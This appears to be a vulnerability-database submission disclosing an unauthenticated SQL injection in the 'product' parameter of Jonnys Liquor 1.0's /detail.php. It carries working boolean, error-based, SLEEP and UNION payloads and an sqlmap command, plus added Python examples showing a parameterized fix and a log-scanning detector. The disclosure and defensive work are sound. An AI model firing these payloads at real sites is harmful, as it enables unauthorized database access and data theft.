| Title | code-projects Jonnys Liquor 1.0 /detail.php SQL injection |
|---|---|
| Description | # Jonnys Liquor V1.0 – SQL Injection in `/detail.php`
## Affected Product
- **Name:** Jonnys Liquor
- **Vendor Homepage:** [https://code-projects.org/jonnys-liquor-in-php-css-javascript-and-mysql-free-download/](https://code-projects.org/jonnys-liquor-in-php-css-javascript-and-mysql-free-download/)
- **Download Link:** [https://code-projects.org/jonnys-liquor-in-php-css-javascript-and-mysql-free-download/](https://code-projects.org/jonnys-liquor-in-php-css-javascript-and-mysql-free-download/)
- **Version:** V1.0
## Vulnerability Details
- **Submitter:** yudeshui
- **Vulnerable File:** `/detail.php`
- **Root Cause:** The user-supplied `product` GET parameter is concatenated directly into the SQL statement without validation or parameterization, so an attacker controls the tail of the `WHERE` clause.
- **CVE:** *(not assigned yet)*
## Problem Type
- **Vulnerability Type:** SQL Injection
- **Access Vector:** Remote, unauthenticated
## Impact
Successful exploitation may lead to:
- Unauthorized database access
- Sensitive data leakage (users, passwords, payment info)
- Data tampering or deletion
- Full system compromise, where the database account additionally holds file-write or similar privileges
- Denial of service (for example through the `SLEEP()`-based payloads below)
## Proof-of-Concept Payloads
Parameter: `product` (GET)
```
---
Parameter: product (GET)

Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: product=1 AND 5290=5290

Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: product=1 OR (SELECT 7427 FROM(SELECT COUNT(*),CONCAT(0x716b6b7071,(SELECT (ELT(7427=7427,1))),0x716b717871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: product=1 AND (SELECT 8656 FROM (SELECT(SLEEP(5)))hQmz)

Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: product=-8616 UNION ALL SELECT CONCAT(0x716b6b7071,0x4355687775584c6d74415370797452755648785363736c4b444c7a4d45787a557665567369594664,0x716b717871)-- -
---
```
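The following is an added example, not code from the advisory or from the Jonnys Liquor project. It models the root cause described above (a raw GET value concatenated into the query) and the hardened form (validate, then bind), and replays the boolean-based and UNION payload classes from the PoC against an in-memory SQLite database that stands in for the application's MySQL backend. The `products`/`users` schema, the `FALSE_PAYLOAD` complement, and the use of `||` in place of MySQL `CONCAT()` are assumptions made so the example runs offline; the MySQL-only error-based and `SLEEP()` payloads are not reproduced here.

```python
import sqlite3

# Payload from the advisory's boolean-based blind check.
TRUE_PAYLOAD = "1 AND 5290=5290"
# Constructed complement: same shape, false condition, used to confirm the
# page reacts to the injected predicate.
FALSE_PAYLOAD = "1 AND 5290=5291"
# UNION payload in the advisory's shape; SQLite has no CONCAT(), so '||' is used
# (assumption) and a users table is read instead of a constant marker.
UNION_PAYLOAD = "-8616 UNION ALL SELECT username || ':' || password FROM users-- -"


def make_db() -> sqlite3.Connection:
    """Constructed sample data; the real schema of the application is not known."""
    db = sqlite3.connect(":memory:")
    db.executescript(
        """
        CREATE TABLE products(id INTEGER PRIMARY KEY, name TEXT);
        CREATE TABLE users(id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO products VALUES (1, 'Whisky'), (2, 'Gin');
        INSERT INTO users VALUES (1, 'admin', 'hunter2');
        """
    )
    return db


def detail_vulnerable(db: sqlite3.Connection, product: str) -> list:
    """Vulnerable pattern: the GET value becomes part of the SQL text."""
    sql = "SELECT name FROM products WHERE id=" + product
    return [row[0] for row in db.execute(sql)]


def detail_parameterized(db: sqlite3.Connection, product: str) -> list:
    """Hardened pattern: reject anything that is not an integer id, then bind.

    The bound value is never parsed as SQL, so even a payload that survives
    validation cannot change the statement's structure.
    """
    try:
        product_id = int(product)
    except ValueError:
        return []  # malformed id: treat as "no such product"
    sql = "SELECT name FROM products WHERE id=?"
    return [row[0] for row in db.execute(sql, (product_id,))]


def run_checks(db: sqlite3.Connection) -> dict:
    """Replay the payloads against both handlers and collect the results."""
    return {
        # Differing results for the true/false pair is the boolean-blind signal.
        "boolean_true": detail_vulnerable(db, TRUE_PAYLOAD),
        "boolean_false": detail_vulnerable(db, FALSE_PAYLOAD),
        # UNION turns the product lookup into a read of another table.
        "union": detail_vulnerable(db, UNION_PAYLOAD),
        # The same payloads are inert against the parameterized handler.
        "param_true": detail_parameterized(db, TRUE_PAYLOAD),
        "param_union": detail_parameterized(db, UNION_PAYLOAD),
        "param_legit": detail_parameterized(db, "1"),
    }


if __name__ == "__main__":
    for name, rows in run_checks(make_db()).items():
        print(f"{name:14s} -> {rows}")
```

Running it shows the vulnerable handler returning `['Whisky']` for the true predicate, nothing for the false one, and `['admin:hunter2']` for the UNION payload, while the parameterized handler returns rows only for the plain integer id.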
## Sqlmap Quick-Check
```bash
sqlmap -u "http://dede:802/detail.php?product=1" --dbs --batch --level=3 --risk=3
```
|
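For defenders, the following added example (not part of the advisory) flags attempts against `/detail.php` in Apache/Nginx combined-format access logs by URL-decoding the `product` parameter and matching it against the four payload classes listed in the PoC. The log lines are constructed for the example, the path filter is scoped to `/detail.php` because that is the file the advisory names, and the regular expressions are assumptions derived from the PoC payloads rather than a vendor-supplied signature.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Constructed sample log lines (combined log format); IPs are documentation ranges.
SAMPLE_LOG = """\
203.0.113.7 - - [21/Nov/2025:16:06:01 +0900] "GET /detail.php?product=1 HTTP/1.1" 200 5120
203.0.113.7 - - [21/Nov/2025:16:06:02 +0900] "GET /detail.php?product=1%20AND%205290%3D5290 HTTP/1.1" 200 5120
203.0.113.7 - - [21/Nov/2025:16:06:03 +0900] "GET /detail.php?product=1%20AND%20%28SELECT%208656%20FROM%20%28SELECT%28SLEEP%285%29%29%29hQmz%29 HTTP/1.1" 200 5120
203.0.113.7 - - [21/Nov/2025:16:06:04 +0900] "GET /detail.php?product=-8616%20UNION%20ALL%20SELECT%20NULL--%20- HTTP/1.1" 200 230
198.51.100.9 - - [21/Nov/2025:16:07:10 +0900] "GET /index.php?product=1%20AND%201%3D1 HTTP/1.1" 200 900
"""

# One pattern per payload class in the advisory, checked in this order.
TECHNIQUES = [
    ("boolean-based blind", re.compile(r"\bAND\s+\d+=\d+", re.I)),
    ("error-based", re.compile(r"\bOR\s*\(SELECT\b.*\bFLOOR\(RAND\(", re.I)),
    ("time-based blind", re.compile(r"\bSLEEP\(\d+\)", re.I)),
    ("UNION query", re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I)),
]

LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)


def classify(value: str):
    """Return the first matching technique name for a decoded product value, else None."""
    # Decode once more to catch double-encoded payloads; harmless on plain text.
    decoded = unquote_plus(value)
    if decoded.strip().lstrip("-").isdigit():
        return None  # a plain integer id is the only legitimate shape
    for name, pattern in TECHNIQUES:
        if pattern.search(decoded):
            return name
    return None


def scan(log_text: str) -> list:
    """Yield one hit per request whose /detail.php product parameter looks like SQLi."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        if not parts.path.endswith("/detail.php"):
            continue
        # parse_qs percent-decodes values; keep_blank_values keeps 'product=' visible.
        for value in parse_qs(parts.query, keep_blank_values=True).get("product", []):
            technique = classify(value)
            if technique:
                hits.append({"ip": m.group("ip"), "ts": m.group("ts"), "technique": technique})
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f"{hit['ts']} {hit['ip']} {hit['technique']}")
```

On the sample input this reports three requests from 203.0.113.7 (boolean, time-based, UNION); the `/index.php` request is ignored by the path filter, and the plain `product=1` request never reaches the patterns. Dropping the `endswith("/detail.php")` check turns it into a generic integer-parameter SQLi screen for the rest of the application.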
| Source | https://github.com/rassec2/dbcve/issues/5 |
|---|---|
| User | yudeshui (UID 91129) |
| Submitted | 2025-11-21 16:06 (5 months ago) |
| Moderation | 2025-11-23 10:47 (2 days later) |
| Status | Accepted |
| VulDB Entry | 333346 [code-projects Jonnys Liquor 1.0 GET Parameter /detail.php product SQL injection] |
| Points | 20 |